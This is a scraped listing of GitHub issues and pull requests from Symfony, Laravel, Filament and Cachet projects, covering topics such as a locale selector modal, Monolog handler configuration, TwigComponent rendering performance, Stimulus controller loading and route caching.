I translated my project with the same method as this demo project and I can't get the dropdown and modal to choose the language. I think it's because of the assets, the way I installed them in my project. The paths with the translated pages work. Whenever I go to /en or /fr, English and français appear in the "Choose your language" section of the menu. What packages do I need to install to make the dropdown, modal, ... work? Can someone help me with this. Here is the code generated by Symfony regarding the dropdown:

<div id="locale-selector-modal" class="modal" tabindex="-1" aria-hidden="true">
    <div class="modal-lg modal-dialog modal-dialog-centered">
        <div class="modal-content">
            <div class="modal-header">
                <p class="modal-title" lang="en">
                                            Choose your language
                </p>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>

            <div class="modal-body">
                <ul class="locales">
                                                                                                        <li class="active " translate="no">
                            <a class="stretched-link" lang="en" hreflang="en" href="[/en/home](https://127.0.0.1:8000/en/home)">
                                English
                                <small>en</small>
                            </a>
                        </li>
                                                                                                        <li class=" " translate="no">
                            <a class="stretched-link" lang="fr" hreflang="fr" href="[/fr/home](https://127.0.0.1:8000/fr/home)">
                                Français
                                <small>fr</small>
                            </a>
                        </li>
                                                                                                
                                        </ul>
            </div>
        </div>
    </div>
</div>

            </li>
View more
5 comments
danian3wa

danian3wa

6th Jan 2025 @ 04:21

If i remember correct the old Swiftmailer handler did include the userIdentifier of the logged in User.

The actual Symfony Mailer handler does not include this info. https://symfony.com/doc/current/logging/monolog_email.html

This would help the reciever to fix the error. And maybe notify the user.

Or is there a reason that this field is not included?

View more
Chris53897

Chris53897

31st Oct 2024 @ 10:06

Status: Needs Review TwigComponent Performance
Q A
Bug fix? no
New feature? no
Deprecations? no
Documentation? no
Issues -
License MIT

Pages that render hundreds of small components (e.g. an EasyAdmin index page renders ~630 components of 15 types: icons, table cells, action-menu items, ...) spend a significant share of their CPU time inside TwigComponent's own render pipeline rather than in the templates. Profiling such a workload showed three recurring per-render costs that this PR removes, without changing any observable behavior: the rendered HTML is byte-identical before/after each commit.

This PR contains three independent commits:

1. Cache ComponentMetadata instances in ComponentFactory

metadataFor() constructed a new ComponentMetadata on every call, and it is called twice per render (create() and ComponentRenderer::preRender()). The class is immutable, so instances are now cached per component name (~1,260 fewer allocations on the page above). The cache is cleared in reset() like the other per-request memo caches.

2. Skip event allocation/dispatch when nobody listens

Every render dispatched 5 freshly-allocated events (PreCreateForRender, PreMount, PostMount, PreRender, PostRender) even with zero listeners registered, the common case in production when the LiveComponent bridge is not installed (~3,150 event allocations + dispatches per request on the page above).

When the injected dispatcher implements the introspectable Symfony\Component\EventDispatcher\EventDispatcherInterface, hasListeners() is now checked (a cheap !empty() array lookup) before creating and dispatching each event:

  • the check is done per dispatch call, so listeners registered at runtime keep working;
  • any other PSR-14 dispatcher keeps the previous unconditional behavior;
  • PreRenderEvent is still always created, because it carries the resolved template and variables to the compiled code; only its dispatch is skipped;
  • when PostMountEvent is skipped, the extra metadata defaults to [], exactly as an undispatched event would report.

The LiveComponent test suite (whose bridge subscribes to these events) passes unchanged against this branch.

3. Build the render variables in a single pass in preRender()

The variables array was spread-copied twice per render: once to create the PreRenderEvent, then a second full [...spread] to append this, computed, outerScope, __props and __context. The second copy is replaced with in-place assignments, the variables are only re-read from the event when it was actually dispatched, and the array_diff_key() call is skipped when there is no outer context (the {{ component() }} function path).

Benchmark

Throw-away Symfony app (prod env, no profiler, OPcache on, Xdebug off) rendering a page of 642 components of 15 types modeled on a real EasyAdmin index-page profile: 225 class-backed icons, 161 nested anonymous items with {% props %} defaults, 100 anonymous table cells with attributes, 23 dropdowns with named blocks, 40 renders via the component() function, etc. Numbers are the median of 5 processes × 30 measured iterations each (5 warmup), hrtime() around a full page render, on PHP 8.5 / Apple Silicon.

Step (cumulative) p50 / page Δ vs 3.x
3.x baseline 6.16 ms
+ metadata cache 6.02 ms −2.3 %
+ event guards 5.54 ms −10.1 %
+ single-pass variables 5.36 ms −13.1 %

The rendered HTML is byte-identical (same SHA-1) for every step, and both the TwigComponent (299 tests) and LiveComponent (387 tests) suites pass.

View more
❤️ 2 🚀 2
javiereguiluz

javiereguiluz

4th Jul 2026 @ 15:14

Hey all, I think I’ve tried about everything. I’m running a cachet server with a docker container. I’m trying to send emails with my host machine’s postfix configuration. I’ve tested postfix on my host machine and it sends emails fine. However the container doesn’t seem to want to send emails out using the sendmail. The mailing configuration is configured the following way:

  • MAIL_DRIVER=sendmail
  • MAIL_HOST=localhost
  • MAIL_PORT=25
  • MAIL_ADDRESS=[DEPRECATED]
  • MAIL_NAME=[DEPRECATED]
  • MAIL_ENCRYPTION=null

I received this solution from an online source (https://github.com/CachetHQ/Cachet/issues/2490) and it still didn’t seem to work (even with the different port).

I also configured my sendmail to allow docker requests on my host machine following this guide (https://www.michelebologna.net/2019/send-an-email-from-a-docker-container/). Which basically says to add the docker inet to inet_interfaces and the docker container ip to mynetworks.

However after all of this I’m still stuck.

Thanks for any help

View more
blpup

blpup

4th Mar 2021 @ 15:31

Hello, I am trying to figure out how can I create multiple bootstrap.js files and load controllers from subdirectories, the purpose of this is load only the required JS per context instead of loading all controllers everywhere. I have the feeling that I am missing something but I tried a lot of things and I can't get it to work. Example:

Originally I have bootstrap.js with this content:

import { startStimulusApp } from '@symfony/stimulus-bridge';

// Registers Stimulus controllers from controllers.json and in the controllers/ directory
export const app = startStimulusApp(require.context(
    '@symfony/stimulus-bridge/lazy-controller-loader!./controllers',
    true,
    /\.(j|t)sx?$/,
));

This is great, I import bootstrap.js in my entrypoints and I can use stimulus controllers everywhere, but this cause that a lots of unused JS appear in differente bundles, as you can see in the image below, mixitup and intlTelInput should not be there since I used both packages in other context but not in this one.

image

What I want to do is create bootstrap.js files per context to minimize this unused JS but I can't get to work controllers in subdirectories with stimulus-bridge.

// bootstrap_landing.js
import { startStimulusApp } from '@symfony/stimulus-bridge';

export const app = startStimulusApp(require.context(
    '@symfony/stimulus-bridge/lazy-controller-loader!./controllers/landing',
    true,
    /\.(j|t)sx?$/,
));
//landing.js Encore entrypoint
import '../../bootstrap_landing';
// other landing stuff
// bootstrap_extranet.js
import { startStimulusApp } from '@symfony/stimulus-bridge';

export const app = startStimulusApp(require.context(
    '@symfony/stimulus-bridge/lazy-controller-loader!./controllers/extranet',
    true,
    /\.(j|t)sx?$/,
));
// extranet.js Encore entrypoint
import '../../bootstrap_extranet';
// other extranet stuff

By doing this, the final bundle that I have show before should be something like this:

image

View more
7 comments 👍 2
devsigner-xyz

devsigner-xyz

5th Jul 2021 @ 13:49

Is there an existing issue for this?

  • I have searched the existing issues

Expected Behavior

I have multiple log files, and I sometimes want to run the "Clear Logs" on certain files without clearing them all.

Actual Behavior

Add the ability to clear individual log files. Would also be nice to filter by log file, too.

Steps to Reproduce

No response

Log/Stack Trace (if applicable)

No response

Laravel Version

13.7.0

Filament Version

5.6.2

filament-log-viewer Version

2.3.0

Other Environment Details

None.

Visual Representation (Optional)

No response

Anything else?

No response

View more
trovster

trovster

5th May 2026 @ 14:56

After #106, autowire of the HubInterface $name and HubInterface $nameHub arguments became unavailable when using the builtin Hub. With this PR, I propose reverting to the previous behavior for such arguments.

View more
1 comment
7-zete-7

7-zete-7

25th Mar 2026 @ 09:23

Feature FrameworkBundle Status: Needs Review Messenger
Q A
Branch? 8.2
Bug fix? no, but yes :)
New feature? yes
Deprecations? no
Issues Fix #64865
License MIT

The middleware unconditionally rejects a redelivered message from its transport before attempting to retry it or send it to a failure transport, which can permanently lose the message if that follow-up step also fails (e.g. an unreachable failure transport). Make this opt-out via framework.messenger.reject_redelivered_message_middleware, enabled by default to preserve current behavior.


This feature has been introduced in d211904c8e6, and it sparked a lot of debate.

For many people (including me), it's not acceptable to allow to loose message! So, let's be able to disable this middlerware.

View more
1 comment
lyrixx

lyrixx

10th Jul 2026 @ 16:26

enhancement pending review

Summary

Adds a Filament\Livewire\Concerns\HasRenderHooks trait that lets a Filament Livewire component declare its own render hooks directly on the class, automatically scoped to itself, instead of registering them externally from a service provider or middleware.

  • Filament\Pages\BasePage uses it directly.

  • Filament\Widgets\TableWidget uses it directly.

  • Filament\Resources\RelationManagers\RelationManager uses it directly.

  • Filament\Resources\Resource is not a Livewire component, so it gets a separate, static-only counterpart: Filament\Resources\Resource\Concerns\HasRenderHooks, exposing a static getRenderHooks() with no booting logic.

  • Filament\Resources\Pages\Page bridges the two by overriding bootHasRenderHooks() to merge its resource's static hooks with its own instance hooks before registering them, all scoped to the page class:

    public function bootHasRenderHooks(): void
    {
        $renderHooks = array_merge(static::getResource()::getRenderHooks(), $this->getRenderHooks());
    
        foreach ($renderHooks as $name => $hook) {
            FilamentView::registerRenderHook($name, $hook, static::class);
        }
    }
    

    Because the page's own hooks are merged in second, a hook name declared on both the resource and the page resolves in favor of the page — the more specific declaration wins.

Motivation

Registering a render hook scoped to a specific page, widget, relation manager, or resource currently requires a service provider call:

FilamentView::registerRenderHook(
    PanelsRenderHook::PAGE_START,
    fn (): View => view('warning-banner'),
    scopes: EditUser::class,
);

This works, but separates the hook from the class it belongs to. Plugin authors and anyone shipping reusable pages, widgets, relation managers, or resources benefit from declaring hooks alongside the class itself, the same way getHeaderActions() or getHeaderWidgets() already work.

Usage

On a page, table widget, or relation manager:

use Filament\View\PanelsRenderHook;
use Illuminate\Contracts\View\View;

class EditUser extends EditRecord
{
    protected function getRenderHooks(): array
    {
        return [
            PanelsRenderHook::PAGE_START => fn (): View => view('warning-banner'),
        ];
    }
}

On a resource:

use Filament\Resources\Resource;
use Filament\View\PanelsRenderHook;
use Illuminate\Contracts\View\View;

class UserResource extends Resource
{
    public static function getRenderHooks(): array
    {
        return [
            PanelsRenderHook::PAGE_START => fn (): View => view('resource-banner'),
        ];
    }
}

Hooks declared on UserResource are automatically picked up by every page belonging to that resource, and registered scoped to each individual page class. If a page declares a hook under the same name, the page's hook takes precedence over the resource's for that page.

View more
1 comment 🚀 1
ahmed-rashad-alnaggar

ahmed-rashad-alnaggar

12th Jul 2026 @ 04:08

Currently WIP as need to prompt for the configuration values if the user says yes to configuring Cachet.

One thing I'm not 100% sure the best approach for is configuring a secondary connection, incase you want to the migrations separate to your main database. Something I'd probably always want to do given the potential for table name clashes etc.

I wasn't sure if either to define getConnectionName() on each model which I think is the approach Laravel Passport takes, or extends the base model and defining on there and having all models extend the internal base model. Or there is probably an even better idea 😄

I've also moved the database settings from the seeder to the migration as it was kind of duplicating the logic, if this is not ok I can revert. Same with moving things from the testbench.yaml as felt it may as well be in the install command now other than the Sqlite file which would be needed for Testbench.

Once the configuration values are set up I am not sure what else would then be needed as its a bit different now given its composer required into applications rather than a standalone Laravel application.

Hopefully this is all ok so far!

View more
14 comments
AlexJump24

AlexJump24

14th Oct 2024 @ 18:50

View more
dxops

dxops

4th Mar 2019 @ 20:07

After upgrading symfony 5.4 to 6.x i always get :

NOTICE: PHP message: PHP Fatal error: Uncaught RuntimeException: The UdpSocket to ..XX.. has been closed and can not be written to anymore in /srv/api/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdp/UdpSocket.php:63

My monolog config

        syslogudp:
            type: syslogudp
            host: '%env(resolve:SYS_LOG_UDP_HOST)%'
            port: '%env(resolve:SYS_LOG_UDP_PORT)%'
            persistent: true
            formatter: monolog.formatter.json
            level: info

this current config work very well with symfony 5.4 and monolog 3.5

View more
4 comments
audain-dg

audain-dg

27th Apr 2022 @ 13:21

DependencyInjection
Q A
Feature PR symfony/symfony#63880
PR author(s) @nicolas-grekas
Merged in 8.1

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.1 branch in the symfony-docs repository.

Thank you! :smiley:

View more
chalasr

chalasr

7th Apr 2026 @ 19:30

Bug Status: Needs Review TwigBridge
View more
xabbuh

xabbuh

14th Jul 2026 @ 06:45

Q A
License MIT
Doc issue/PR none

Reason: Make it more obvious that the channels key here does not contain the full list of all channels.

View more
1 comment
ThomasLandauer

ThomasLandauer

9th Dec 2025 @ 12:26

Bug Status: Needs Review LiveComponent
Q A
Bug fix? yes
New feature? no
Issues Fix #3412
License MIT

Supports the approach discussed in #3412.

data-model on a Twig Component wrapping <input type="radio"> / <input type="checkbox"> currently overwrites the per-input value attribute with the current prop value (so every input in a group ends up indistinguishable), and data-model="selected[]" crashes the PropertyAccessor.

DataModelPropsSubscriber now:

  • Bug 2 — strips the JS-only [] notation (rtrim($parent, '[]')) before resolving the property path.
  • Bug 1 — for radio/checkbox, computes checked instead of overwriting value. Detection does not rely on a type prop (which may be hardcoded in the child template, e.g. the Shadcn Checkbox — @Kocal's concern), but on the prop value and the presence of an explicit value:
    • bool prop → boolean checkbox → set checked;
    • explicit value + array prop → checkbox group → checked = in_array(value, prop), keep value;
    • explicit value + scalar prop → radio → checked = (value == prop), keep value;
    • otherwise (text/email/number/…) → unchanged, value is set from the prop.

Comparisons are kept loose to mirror the JS setValueOnElement behavior. Tests cover radio, checkbox group (incl. the [] notation), a boolean checkbox whose type is hardcoded in the template, and a regular text input (no regression).

One edge case worth confirming: a text input carrying both an explicit value and a data-model is now treated as radio/checkbox. This is contradictory usage that is already broken today, so there should be no regression — but happy to adjust if you'd prefer a stricter detection.

View more
Amoifr

Amoifr

12th Jun 2026 @ 07:04

Agent

A bunch of thoughts - some are independent from each other, others are coupled.

A) Tool and ToolResult are not coupled at all (loose coupling). Using a tool - executing it - making a tool call - produces a result - which from a semantical point of view leads to at least some coherence between these two. And this is the responsibility of the Toolbox. Looking into how this is done reveals that we need 3 pieces of information: the execution reference, the method name, the arguments - to turn an execution into a result. What about moving the executing logic out of the toolbox into the tool itself? Looking at Toolbox::execute() we provide the tool-call as an argument which is used to find the right tool. Ofcourse the argument resolver is necessary too. Idea behind this: narrow responsibilities of the Toolbox to providing tools - not executing them.

B) I find the 2 notions - tool and metadata - how they are used inside the Toolbox very confusing. The metadata is of type Tool whereas the tool itself is of type object. I understand that the later one is the "execution reference" - the piece of code which is executed during a tool call whereas the metadata is the meta data which carries the execution reference itself. I also understand that these notions are somewhat accepted across the code base. Though, I am not happy with how it is encapsulated in the implementation of the Toolbox itself.

C) Currently the Toolbox carries 2 member variables: a collection of metadata objects (of type array of Tool) and a map for tool names and their respective "execution reference". In my opinion this can be reduced into a single member variable - a single map - where the name of the tool maps to it's meta data and execution reference. This would reduce state of this class a lot and avoid inconsistencies between the 2 member variables. It would also simplify initialization logic implemented inside the Toolbox.

D) Throwing exceptions, returning results and raising events are 3 ways of emitting side effects. All this is happening in Toolbox::execute(). In my opinion this mix of responsibility is overwhelming and can be simplified. I suggest to turn ToolResult into an either-or-monad which carries either the success state or the error state of the tool call (the execution reference call). This monad can execute event emitting logic or exception throw logic too.

View more
1 comment
makomweb

makomweb

30th Jun 2026 @ 10:21

View more
👍 1
tacman

tacman

28th May 2025 @ 10:20

Hi,

after installing your bundle, it automatically removes index.php from my URLs (so this is great !) but I still have the public folder.

How can I remove it too ? Should I do it in the /public/.htaccess or configure a virtual host in apache ? I develop locally on a PC with Wampserver.

URL before installing apache-pack : http://localhost/project/public/index.php/my-page

URL after installation : http://localhost/project/public/my-page

Desired URL : http://localhost/project/my-page

/public/.htaccess (generated by apache-pack) :

DirectoryIndex index.php

<IfModule mod_negotiation.c>
    Options -MultiViews
</IfModule>

<IfModule mod_rewrite.c>
    RewriteEngine On

    RewriteCond %{REQUEST_URI}::$1 ^(/.+)/(.*)::\2$
    RewriteRule ^(.*) - [E=BASE:%1]

    # Sets the HTTP_AUTHORIZATION header removed by Apache
    RewriteCond %{HTTP:Authorization} .
    RewriteRule ^ - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

    RewriteCond %{ENV:REDIRECT_STATUS} ^$
    RewriteRule ^index\.php(?:/(.*)|$) %{ENV:BASE}/$1 [R=301,L]

    # If the requested filename exists, simply serve it.
    # We only want to let Apache serve files and not directories.
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteRule ^ - [L]

    # Rewrite all other queries to the front controller.
    RewriteRule ^ %{ENV:BASE}/index.php [L]
</IfModule>

<IfModule !mod_rewrite.c>
    <IfModule mod_alias.c>
        # When mod_rewrite is not available, we instruct a temporary redirect of
        # the start page to the front controller explicitly so that the website
        # and the generated links can still be used.
        RedirectMatch 307 ^/$ /index.php/
        # RedirectTemp cannot be used instead
    </IfModule>
</IfModule>

View more
7 comments 👍 2
eved42

eved42

16th Oct 2018 @ 08:10

Why are these in both require and require dev?

 "require-dev": {
        "symfony/debug-pack": "*",
        "symfony/profiler-pack": "*",
        "symfony/maker-bundle": "^1.0",
        "symfony/test-pack": "*"
    },

Is it okay to remove them from require?

View more
tacman

tacman

6th Nov 2025 @ 11:57

Bug Status: Needs Review TwigComponent

I have run into an edge case where I’m using ICU messages in a translatable string, and the message has plural cases in it. See here for a more complete documentation, but here’s an example string:

{count, plural, 
   one {# item}
   other {# items}
}

This trips up the Twig PreLexer and makes it look for an end-of-comment #} that it may or may not find, and ignore all <twig:Blocks> until it finds one.

Here's a minimal template as example:

There are {{ '{count, plural, one {# item} other {# items}}'|trans({'count': 42}) }}!

<twig:Test />

It outputs:

There are {42, plural, one {# item} other {# items}}!

<twig:Test />#}

The ICU syntax isn’t processed in the raw string, but this doesn’t matter in practice since it’s only here as a placeholder for translators. Real strings from XLIFF files are handled correctly. Most importantly, the HTML tag is present in the output… Now, if I modify the template to add a “fake” comment:

There are {{ '{count, plural, one {# item} other {# items}}'|trans({'count': 42}) }}!
{# Comment #}
<twig:Test />

The component is now rendered:

There are {42, plural, one {# item} other {# items}}!
TEST COMPONENT

I understand this is niche/edge case, and in any case thanks a lot for your hard work on this project and thanks for your time!

View more
3 comments
balbinus

balbinus

2nd May 2026 @ 13:04

Sometimes if test case is big and too long screenshot may not be saved with following error:

Warning: file_put_contents(./var/error-screenshots/2025-04-01_17-31-36_failure_App-Tests-E2E-SignUp-SignUpTest__testSuccessfulSignup with data set "user without vat" (['SIA ATTA-1 SignupTest 2', 'SignUp', 'Test', '[email protected]', 'LV12345678912', 'Daugavgrīvas iela', '77', 'Rīga', 'LV', 'LV-1007', 'LV', '22084444', 'comment'], false)-0.png): Failed to open stream: Filename too long in /app/vendor-bin/phpunit/vendor/php-webdriver/webdriver/lib/Support/ScreenshotHelper.php on line 70

there was a ticket for that https://github.com/symfony/panther/pull/510/files but changes got lost or never merged

View more
oleg-andreyev

oleg-andreyev

1st Apr 2025 @ 14:48

Feature Translation Status: Needs Review
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues N/A
License MIT

Another stab at #64155: same as #64594, but for Crowdin.

View more
MatTheCat

MatTheCat

11th Jul 2026 @ 15:12

Bug

This configuration for monolog stops generation of logs in var/log/ when adding excluded_http_codes: [404]. When we disable it, it works.


monolog:
  handlers:
    main:
      type:  fingers_crossed
      path:  '%kernel.logs_dir%/%kernel.environment%.log'
      level: warning
      excluded_http_codes: [404]
      channels: ['!event']
      handler: grouped
    grouped:
      type:    group
      members: [streamed, deduplicated]
    streamed:
      type:  rotating_file
      path:  '%kernel.logs_dir%/%kernel.environment%.log'
      level: warning
      max_files: 5
    deduplicated:
      type:    deduplication
      handler: symfony_mailer
    symfony_mailer:
      type:       symfony_mailer
      from_email: '%env(MAILER_MONOLOG_ADDRESS)%'
      to_email:   '%env(MAILER_MONOLOG_ADDRESS)%'
      subject:    '[%kernel.environment%-ERROR] %%message%%'
      level:      warning
      formatter:  monolog.formatter.html
      content_type: text/html
    console:
      type: console

Using a simpler configuration, its works properly such as :

monolog:
  handlers:
    main:
      type:  fingers_crossed
      path:  '%kernel.logs_dir%/%kernel.environment%.log'
      level: warning
      channels: ['!event']
      handler: grouped
      excluded_http_codes: [404]
    grouped:
      type:    group
      members: [streamed]
    streamed:
      type:  rotating_file
      path:  '%kernel.logs_dir%/%kernel.environment%.log'
      level: warning
      max_files: 5

View more
3 comments
fodger

fodger

31st Aug 2023 @ 08:51

Hi

Cachet offers us the ability to schedule maintenance on components of our system. In the event that a component is not functioning properly during the maintenance period, we find that a status is missing that allows us to place a component "under maintenance" rather than "down."

Currently using version 2.1 of Cachet, we have received feedback from users who believe that some systems are frequently down, even though they are only under maintenance.

Would it be possible to add an "under maintenance" status to the ComponentStatusEnum list in version 3?

View more
2 comments
Pingoo31

Pingoo31

15th May 2025 @ 15:07

Status: Needs Work
Q A
Bug fix? no
New feature? no
Docs? no
Issues -
License MIT

This PR is to increase coverage of Toolbox code to 100%. Only change in non-test code was in FaultTolerantToolbox to use the exceptions getToolCall method for full coverage. Side-note: Noticing this brought me to the idea to simplify the exception hierarchy of the Toolbox (see https://github.com/symfony/ai/issues/2257 for details).


Before


After

View more
makomweb

makomweb

30th Jun 2026 @ 08:53

bug

Contact Details

[email protected]

What happened?

Have a mariadb database (10.4 for example), make a backup destination task. The dump process but the verification failed.

Version

v1.13.0 & v1.13.1

What browsers are you seeing the problem on?

Chrome

Relevant log output


View more
xfarret

xfarret

22nd Nov 2025 @ 16:53

GFM allows rendering emojis without requiring the markers to be surrounded by spaces, even so, you can render multiple emojis continuously.

The current implementation of this extension doesn't allow emojis to be rendered if they are not surrounded by spaces.

Look at the following table for comparison:

MD String CachetHQ's Render Github Render
:+1:123 image :+1:123
:+1::+1: image :+1::+1:
¡Viva Mexico :mexico:! image ¡Viva Mexico :mexico:!

Hope you agree to merge this :open_hands:.

View more
iksaku

iksaku

3rd Jan 2020 @ 21:51

Priority: P4 (Low - Nice to Have)

Problem

ComponentStatusEnum includes performance_issues, but SystemStatusEnum has no corresponding case. A system with components all in performance_issues state (but none in partial/major outage) would report as partial_outage via Status::current().

This is likely intentional but worth documenting.

Suggested Fix

Add a comment to Status::current() explaining that performance issues roll up to partial outage, or add a performance_issues case to SystemStatusEnum.

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:43

View more
1 comment
rsvitak

rsvitak

14th Feb 2023 @ 16:01

Messenger
Q A
Feature PR symfony/symfony#64094
PR author(s) @Toflar
Merged in 8.1

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.1 branch in the symfony-docs repository.

Thank you! :smiley:

View more
2 comments
nicolas-grekas

nicolas-grekas

4th May 2026 @ 15:56

Q A
Issues Companion to symfony/ux#3473
License MIT

Companion PR to symfony/ux#3473. Adds the Toolkit/Shadcn docs page for the drawer recipe.

Kept as draft until symfony/ux#3473 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:21

bug unconfirmed medium priority

Package

filament/filament

Package Version

5.6.8

Laravel Version

12

Livewire Version

No response

PHP Version

8.3

Problem description

When using stickyModalHeader() and stickyModalFooter() on a modal that requires scrolling, the scrollbar arrows overlap and clip the rounded corners of the modal container. This creates an unpolished UI glitch where the native scrollbar track ignores the border-radius of the parent modal.

Expected behavior

The modal container should maintain its rounded corners (border-radius), and the scrollbar should either be clipped properly inside the container or padded so it does not break the visual layout.

Steps to reproduce

  1. Create a fresh clean Filament 4 project.
  2. Create user resource.
  3. Remove the edit URL route.
  4. Add sticky header and footer to edit action.
                EditAction::make()
                    ->stickyModalFooter()
                    ->stickyModalHeader(),

Reproduction repository (issue will be closed if this is not valid)

https://github.com/NgYueHong/FilamentBug

Relevant log output


View more
NgYueHong

NgYueHong

13th Jul 2026 @ 02:03

As of Chrome 88, cookies must be SiteSite=Lax/Strict or SiteSite=none; Secure. That means running a Mercure server on http isn't possible when running a Symfony dev server on https. I've tried upgrading to Mercure v0.11 with HTTPS, but that uses a self-signed certificate that isn't trusted by Chrome. I tried to use the "allow-insecure-localhost" flag in Chrome, but that flag has been removed in Chrome 88. I found a workaround by setting temporary-unexpire-flags-m87. That works only temporarily and isn't a great developer experience either.

It would be great if we can use the Symfony certificate for Mercure as well, like we can with Webpack Encore's dev server.

View more
2 comments 👍 5
stephanvierkant

stephanvierkant

4th Feb 2021 @ 10:56

dependencies github_actions

Bumps actions/cache from 5 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 09:24

While trying to improve some configuration blocks in Symfony docs, I found out that it was not possible to use constants for the verbosity levels of the console handler. I think it's missing now that we tend to spread PHP config files such as config/packages/monolog.php.

Before this patch one gets the following exception:

Symfony\Component\Config\Definition\Exception\InvalidConfigurationException: Unrecognized options "32, 128" under "monolog.handlers.console.verbosity_levels". Available options are "VERBOSITY_DEBUG", "VERBOSITY_NORMAL", "VERBOSITY_QUIET", "VERBOSITY_VERBOSE", "VERBOSITY_VERY_VERBOSE".
View more
1 comment
HeahDude

HeahDude

21st May 2022 @ 17:41

Q A
Branch? 1.x
Bug fix? no
New feature? yes
Deprecations? no
Issues
License MIT

This pull request adds the --target option to the make:validator command to speed up the creation and the use of a custom validation constraint.

Usage

php bin/console make:validator FooValidator --target=class
php bin/console make:validator FooValidator --target=method
php bin/console make:validator FooValidator --target=property

Result

Target Constraint class changes
class - Add the #[\Attribute(\Attribute::IS_REPEATABLE)] declaration,- Add the Constraint::getTargets required method.
method - Add the #[\Attribute(\Attribute::TARGET_METHOD | \Attribute::IS_REPEATABLE)] declaration.
property - Add the #[\Attribute(\Attribute::TARGET_PROPERTY | \Attribute::IS_REPEATABLE)] declaration.
View more
2 comments
nextpageblog

nextpageblog

19th Nov 2025 @ 20:04

RFC

I find the current exception hierarchy of the Toolbox very confusing. So I wrapped my head around it. At the same time I don't wanna introduce breaking changes. That's why I am proposing a cautious refactoring. The fundamental change is to remove ToolExecutionExceptionInterface and use ToolExecutionException directly. I don't see any benefit of having this interface. If I am missing something please enlighten me. Here is the proposed hierarchy: current implementation vs. without the interface

View more
makomweb

makomweb

30th Jun 2026 @ 07:01

Fixes #60758

Summary

route:cache was calling prepareForSerialization() directly on live route instances. That method intentionally removes router and container from a route, which makes those instances unusable for any further analysis in the same PHP process.

This becomes a problem during php artisan optimize, which runs route:cache before commands registered via ServiceProvider::optimizes(). Any package that registers an optimize task needing to analyze routes (for example, to cache generated metadata) can fail with LogicException: Route is not bound.

This PR clones each route before preparing it for serialization, and writes the route cache file from the cloned collection. Live route instances are left untouched.

Reproduction

https://github.com/hosni/laravel-optimize-command-bug

Changes

  • Extract route preparation into prepareRoutes()
  • Clone each Route before calling prepareForSerialization()
  • Build the route cache file from a new collection of prepared clones
  • Add integration tests covering route:cache and the optimize flow

Benefit to end users

Packages can safely register optimize tasks via $this->optimizes() that need to analyze application routes after route:cache has run. This makes php artisan optimize a reliable single command for deployment workflows that combine framework caching with package-level metadata caching.

Why this does not break existing behavior

  • The generated route cache file is still built from the same route data, passed through prepareForSerialization() and compile(), only the source instances are cloned first.
  • route:cache behavior is unchanged from the perspective of cached route loading on subsequent requests.
  • No public API changes.

Test plan

  • Added RouteCacheCommandTest with regression coverage
  • Routes remain analyzable after route:cache in the same process
  • optimize can run custom tasks that analyze routes after route:cache
  • Verified tests fail when the clone fix is reverted
vendor/bin/phpunit tests/Integration/Foundation/Console/RouteCacheCommandTest.php
View more
hosni

hosni

13th Jul 2026 @ 15:17

It needs to be an array for this eventListener to be triggered (just get the case where this eventListener is not triggered because of that)

View more
2 comments
flovntp

flovntp

13th May 2025 @ 07:02

Status: Needs Review

Adds a new reference/configuration/services.rst page that documents every key accepted under the top-level services: section of a Symfony configuration file (YAML, XML and PHP), following the format used by the other reference/configuration/*.rst pages.

Fixes #22238

View more
❤️ 1
lacatoire

lacatoire

13th Apr 2026 @ 12:17

Q A
Bug fix? no
New feature? yes
BC breaks? no
Issues #1344
License MIT

This PR is a proof of concept to support the discussion in #1344 — it is not intended to be merged as-is, but to serve as a concrete base for the ongoing reflection.

What it does

Adds an optional namespaces configuration to override the default namespace for generated classes:

maker:
    namespaces:
        entity: Domain\Entity
        controller: Application\Controller
        repository: Infrastructure\Repository

The directory is derived automatically from PSR-4 autoloading rules (no dir option needed, as @GromNaN suggested).

Design choices

  • NamespaceType enum — replaces magic strings with a typed enum for all 5 configurable types (controller, command, entity, form, repository). Provides IDE autocompletion and prevents typos.
  • Defaults centralized in the enum — each case knows its default via defaultNamespace(). The Generator merges user config on top of these defaults.
  • Open map via scalarPrototype — the config accepts any key, not a fixed list. Users can override only what they need.
  • Validation — each namespace value is validated via Validator::validateClassName().
  • 10 makers updated — all makers using the 5 configurable types now go through $generator->getNamespace(NamespaceType::Entity) instead of hardcoded 'Entity\\'.
  • No constructor injection neededGenerator is already available in generate(). The MakeController logic was moved from interact() to generate() to avoid adding a constructor dependency.

What's NOT in scope (possible follow-ups)

  • CLI option (--namespace) for one-off overrides (mentioned by @GromNaN)
  • Additional types beyond the initial 5 (listener, message, voter, etc.)
View more
Amoifr

Amoifr

10th Apr 2026 @ 10:30

enhancement

Contact Details

[email protected]

Feature Title

Improve the session modal by adding a JS map

Feature Description

The map would pinpoint the rough area of the IP address.

Vanguard Version

v1.12.0

Current Issues

No response

Additional Context

No response

Resources

No response

View more
lewislarsen

lewislarsen

4th Mar 2025 @ 08:36

This merge request fixes a formatting issue in the help text of the make:form command by correcting the sprintf placeholder.

It displays as (%F):

